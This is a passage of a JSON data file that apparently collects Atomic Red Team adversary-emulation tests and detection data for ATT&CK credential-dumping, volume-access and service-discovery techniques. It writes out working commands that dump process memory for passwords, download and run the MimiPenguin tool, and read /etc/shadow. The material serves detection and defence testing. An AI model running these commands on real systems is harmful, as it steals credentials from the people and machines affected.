heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON PathToAtomicsFolder/T1003.007/src/dump_heap.py $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "sudo #{MimiPenguin_Location} > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n", + "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > #{output_file}\ncat #{output_file}\n" + ], + "commands": [ + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep 
heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"/tmp/T1003.007.bin\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID /tmp/T1003.007.bin\ngrep -i \"PASS\" \"/tmp/T1003.007.bin\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS 
Credential Dumping: Proc Filesystem" + }, + { + "command": "sh /tmp/T1003.007.sh\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON PathToAtomicsFolder/T1003.007/src/dump_heap.py $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"T1003.007\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sudo #{MimiPenguin_Location} > /tmp/T1003.007Test3.txt\ncat /tmp/T1003.007Test3.txt\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + }, + { + "command": "sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > #{output_file}\ncat #{output_file}\n", + "source": "atomics/T1003.007/T1003.007.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: Proc Filesystem" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.007", + "display_name": "OS Credential Dumping: Proc Filesystem", + "atomic_tests": [ + { + "name": "Dump individual process memory with sh (Local)", + "auto_generated_guid": "7e91138a-8e74-456d-a007-973d67a0bb80", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to\ncopy process memory to an external 
file so it can be searched or exfiltrated later.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007.bin" + }, + "script_path": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "/tmp/T1003.007.sh" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "String", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nHEAP_MEM=$(grep -E \"^[0-9a-f-]* r\" /proc/\"$PID\"/maps | grep heap | cut -d' ' -f 1)\nMEM_START=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f1))))\nMEM_STOP=$(echo $((0x$(echo \"$HEAP_MEM\" | cut -d\"-\" -f2))))\nMEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))\ndd if=/proc/\"${PID}\"/mem of=\"#{output_file}\" ibs=1 skip=\"$MEM_START\" count=\"$MEM_SIZE\"\ngrep -i \"PASS\" \"#{output_file}\"\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, + { + "name": "Dump individual process memory with Python (Local)", + "auto_generated_guid": "437b2003-a20d-4ed8-834c-4964f24eec63", + "description": "Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to\ncopy a process's heap memory to an external file so it can be searched or exfiltrated later.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007.bin" + 
}, + "script_path": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "/tmp/T1003.007.sh" + }, + "python_script": { + "description": "Path to script generating the target process", + "type": "Path", + "default": "PathToAtomicsFolder/T1003.007/src/dump_heap.py" + }, + "pid_term": { + "description": "Unique string to use to identify target process", + "type": "String", + "default": "T1003.007" + } + }, + "dependencies": [ + { + "description": "Script to launch target process must exist\n", + "prereq_command": "test -f #{script_path}\ngrep \"#{pid_term}\" #{script_path}\n", + "get_prereq_command": "echo '#!/bin/sh' > #{script_path}\necho \"sh -c 'echo \\\"The password is #{pid_term}\\\" && sleep 30' &\" >> #{script_path}\n" + }, + { + "description": "Requires Python\n", + "prereq_command": "(which python || which python3 || which python2)\n", + "get_prereq_command": "echo \"Python 2.7+ or 3.4+ must be installed\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sh #{script_path}\nPID=$(pgrep -n -f \"#{pid_term}\")\nPYTHON=$(which python || which python3 || which python2)\n$PYTHON #{python_script} $PID #{output_file}\ngrep -i \"PASS\" \"#{output_file}\"\n", + "cleanup_command": "rm -f \"#{output_file}\"\n" + } + }, + { + "name": "Capture Passwords with MimiPenguin", + "auto_generated_guid": "a27418de-bdce-4ebd-b655-38f04842bf0c", + "description": "MimiPenguin is a tool inspired by MimiKatz that targets Linux systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin will retrieve passwords from memory and output them to a specified file. \nSee https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. 
\nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.007Test3.txt" + }, + "MimiPenguin_Location": { + "description": "Path of MimiPenguin script", + "type": "Path", + "default": "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "MimiPenguin script must exist on disk at specified location (#{MimiPenguin_Location})\n", + "prereq_command": "if [ -f \"#{MimiPenguin_Location}\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "wget -O \"/tmp/mimipenguin.tar.gz\" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz\nmkdir /tmp/mimipenguin\ntar -xzvf \"/tmp/mimipenguin.tar.gz\" -C /tmp/mimipenguin\n" + }, + { + "description": "Strings must be installed\n", + "prereq_command": "if [ -x \"$(command -v strings --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install binutils\n" + }, + { + "description": "Python2 must be installed\n", + "prereq_command": "if [ -x \"$(command -v python2 --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install python2 \n" + }, + { + "description": "Libc-bin must be installed\n", + "prereq_command": "if [ -x \"$(command -v ldd --version)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "sudo apt-get -y install libc-bin \n" + } + ], + "executor": { + "command": "sudo #{MimiPenguin_Location} > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file} > /dev/null\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + 
"possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1003.008", + "command_list": [ + "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", + "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n" + ], + "commands": [ + { + "command": "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + }, + { + "command": "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + }, + { + "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and 
/etc/shadow" + }, + { + "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n", + "source": "atomics/T1003.008/T1003.008.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1003.008", + "display_name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "atomic_tests": [ + { + "name": "Access /etc/shadow (Local)", + "auto_generated_guid": "3723ab77-c546-403c-8fb4-bb577033b235", + "description": "/etc/shadow file is accessed in Linux environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "sudo cat /etc/shadow > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Access /etc/passwd (Local)", + "auto_generated_guid": "60e860b6-8ae6-49db-ad07-5e73edd88f5d", + "description": "/etc/passwd file is accessed in Linux environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "cat /etc/passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh" + } + }, + { + "name": "Access /etc/{shadow,passwd} with a standard bin that's not cat", + "auto_generated_guid": "df1a55ae-019d-4120-bc35-94f4bc5c4b0a", + "description": "Dump /etc/passwd and /etc/shadow using ed\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": 
"/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Access /etc/{shadow,passwd} with shell builtins", + "auto_generated_guid": "f5aa6543-6cb2-4fae-b9c2-b96e14721713", + "description": "Dump /etc/passwd and /etc/shadow using bash builtins\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "Path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > #{output_file}\ntestcat /etc/shadow > #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + 
"source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1006", + "command_list": [ + "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\C:\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex -InputObject $buffer\n" + ], + "commands": [ + { + "command": "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\C:\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex 
-InputObject $buffer\n", + "source": "atomics/T1006/T1006.yaml", + "name": "Atomic Red Team Test - Direct Volume Access" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1006", + "display_name": "Direct Volume Access", + "atomic_tests": [ + { + "name": "Read volume boot sector via DOS device path (PowerShell)", + "auto_generated_guid": "88f6327e-51ec-4bbf-b2e8-3fea534eab8b", + "description": "This test uses PowerShell to open a handle on the drive volume via the `\\\\.\\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.\nOn success, a hex dump of the first 11 bytes of the volume is displayed.\n\nFor a NTFS volume, it should correspond to the following sequence ([NTFS partition boot sector](https://en.wikipedia.org/wiki/NTFS#Partition_Boot_Sector_(VBR))):\n```\n 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F\n\n00000000 EB 52 90 4E 54 46 53 20 20 20 20 \u00ebR?NTFS\n```", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "volume": { + "description": "Drive letter of the volume to access", + "type": "String", + "default": "C:" + } + }, + "executor": { + "command": "$buffer = New-Object byte[] 11\n$handle = New-Object IO.FileStream \"\\\\.\\#{volume}\", 'Open', 'Read', 'ReadWrite'\n$handle.Read($buffer, 0, $buffer.Length)\n$handle.Close()\nFormat-Hex -InputObject $buffer\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "API monitoring" + ], + { + 
"data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1007", + "command_list": [ + "tasklist.exe\nsc query\nsc query state= all\n", + "net.exe start >> C:\\Windows\\Temp\\service-list.txt\n", + "systemctl --type=service\n", + 
"Get-Service" + ], + "commands": [ + { + "command": "tasklist.exe\nsc query\nsc query state= all\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "net.exe start >> C:\\Windows\\Temp\\service-list.txt\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "systemctl --type=service\n", + "source": "atomics/T1007/T1007.yaml", + "name": "Atomic Red Team Test - System Service Discovery" + }, + { + "command": "Get-Service", + "source": "data/abilities/discovery/c6607391-d02c-44b5-9b13-d3492ca58599.yml", + "name": "Identify system services" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1007", + "display_name": "System Service Discovery", + "atomic_tests": [ + { + "name": "System Service Discovery", + "auto_generated_guid": "89676ba1-b1f8-47ee-b940-2e1a113ebc71", + "description": "Identify system services.\n\nUpon successful execution, cmd.exe will execute service commands with expected result to stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "tasklist.exe\nsc query\nsc query state= all\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "System Service Discovery - net.exe", + "auto_generated_guid": "5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3", + "description": "Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.\n\nUpon successful execution, net.exe will run from cmd.exe that queries services. 
Expected output is to a txt file in c:\\Windows\\Temp\\service-list.txt.s\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path of file to hold net.exe output", + "type": "Path", + "default": "C:\\Windows\\Temp\\service-list.txt" + } + }, + "executor": { + "command": "net.exe start >> #{output_file}\n", + "cleanup_command": "del /f /q /s #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "System Service Discovery - systemctl", + "auto_generated_guid": "f4b26bce-4c2c-46c0-bcc5-fce062d38bef", + "description": "Enumerates system service using systemctl\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "systemctl --type=service\n", + "name": "bash" + } + } + ] + }, + { + "id": "c6607391-d02c-44b5-9b13-d3492ca58599", + "name": "Discover system services", + "description": "Identify system services", + "tactic": "discovery", + "technique": { + "attack_id": "T1007", + "name": "System Service Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Get-Service" + } + } + } + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"tasklist.exe\"or process_path contains \"sc.exe\"or process_path contains \"wmic.exe\")and (file_directory contains \"net.exe\\\" start\"or file_directory contains \"tasklist.exe\\\" /SVC\"and file_directory contains \"sc.exe\\\" query\"or file_directory contains \"wmic.exe\\\" service where\")", + "name": "System Service Discovery" + } + ], + "possible_detections": [ + { + "title": "Query Registry", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", + "status": "experimental", + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": 
